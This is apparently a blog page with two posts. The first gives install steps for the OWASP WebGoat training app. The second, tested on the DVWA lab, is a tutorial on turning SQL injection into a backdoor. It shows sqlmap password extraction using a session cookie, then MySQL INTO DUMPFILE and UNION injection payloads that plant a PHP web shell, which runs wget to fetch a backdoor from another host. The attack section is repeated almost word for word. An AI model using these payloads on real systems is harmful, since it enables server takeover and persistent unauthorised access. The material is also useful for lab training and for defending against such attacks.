WebGoat is a deliberately insecure J2EE web application maintained by OWASP designed to teach web application security lessons. In each lesson, users must demonstrate their understanding of a security issue by exploiting a real vulnerability in the WebGoat application. For example, in one of the lessons the user must use SQL injection to steal fake credit card numbers. The application is a realistic teaching environment, providing users with hints and code to further explain the lesson.
1. Before installing firs download webgoat from this link .
2. To extract the file format 7zip, install p7zip by :
apt-get install p7zip
3. Now extract webgoat file :
p7zip -d WebGoat-OWASP_Standard-5.3_RC1.7z
4. if the extract has been completed, go into the folder extract :
cd WebGoat-OWASP_Standard-5.3_RC1
5. change the file permissions webgoat.sh to be executable by this commant :
chmod +x webgoat.sh
6. webgoat need to run the OpenJDK-6-jre and openjdk-6-jdk, and to get it can use the following command :
apt-get install openjdk-6-jre openjdk-6-jdk
7. After installation is now ready to run webgoat on port 80 or 8080 by this commant:
./webgoat.sh start80 or ./webgoat star8080
Now we can open webgoat from browser bay this url http://127.0.0.1/webgoat/attack
Sunday, October 30, 2011
Generate backdoor from SQL injection
To create backdoor from sql injection, the web must be vulnerable with sql injection. then we find the password for mysql database, that can be do with some tecnique, like social enginering or scanning with sqlmap, for exemple :
root@bt:/pentest/database/sqlmap# ./sqlmap.py -u "http://192.168.56.101/dvwa/vulnerabilities/sqli/?id=&Submit=Submit" --cookie="Cookie: security=high; PHPSESSID=5c0eecdbcf2a5acdee16c2b389be67e4" --password
after we got the password, now we enter to mysql with the following sintax:
root@bt:/pentest/database/sqlmap# mysql -h [host ip] -u root -p
then press enter and input the password we got.
now we on my sql shell, and from here we can create database and create backdoor. this sample sintax to download backdoor from other web :
mysql> select "<? system('wget 192.168.56.1/cn.txt -O bar.php'); ?>" into dumpfile '/opt/lampp/htdocs/dvwa/bad.php' --;
Query OK, 1 row affected (0.00 sec)
now we can acces "bad.php" , and after we acces it, the php syntak where in that well be execute and backdoor cn.txt well be uploded in dvwa directori and well be rename with bar.php
finally, we can acces bar.php in http:###.###.###.###/dvwa/bar.php
Other way :
we just insert the sql query to vulnerable form like this :
1' union select 1,"<? system('wget 192.168.56.1/cn.txt -O bar.php'); ?>" into dumpfile '/opt/lampp/htdocs/dvwa/a.php
and where we access the "a.php" file then "wget 192.168.56.1/cn.txt -O bar.php" well be executed and backdoor well be downloaded by server.
root@bt:/pentest/database/sqlmap# ./sqlmap.py -u "http://192.168.56.101/dvwa/vulnerabilities/sqli/?id=&Submit=Submit" --cookie="Cookie: security=high; PHPSESSID=5c0eecdbcf2a5acdee16c2b389be67e4" --password
after we got the password, now we enter to mysql with the following sintax:
root@bt:/pentest/database/sqlmap# mysql -h [host ip] -u root -p
then press enter and input the password we got.
now we on my sql shell, and from here we can create database and create backdoor. this sample sintax to download backdoor from other web :
mysql> select "<? system('wget 192.168.56.1/cn.txt -O bar.php'); ?>" into dumpfile '/opt/lampp/htdocs/dvwa/bad.php' --;
Query OK, 1 row affected (0.00 sec)
now we can acces "bad.php" , and after we acces it, the php syntak where in that well be execute and backdoor cn.txt well be uploded in dvwa directori and well be rename with bar.php
finally, we can acces bar.php in http:###.###.###.###/dvwa/bar.php
we just insert the sql query to vulnerable form like this :
1' union select 1,"<? system('wget 192.168.56.1/cn.txt -O bar.php'); ?>" into dumpfile '/opt/lampp/htdocs/dvwa/a.php
and where we access the "a.php" file then "wget 192.168.56.1/cn.txt -O bar.php" well be executed and backdoor well be downloaded by server.
<thi sample tested in DVWA>
Subscribe to:
Posts (Atom)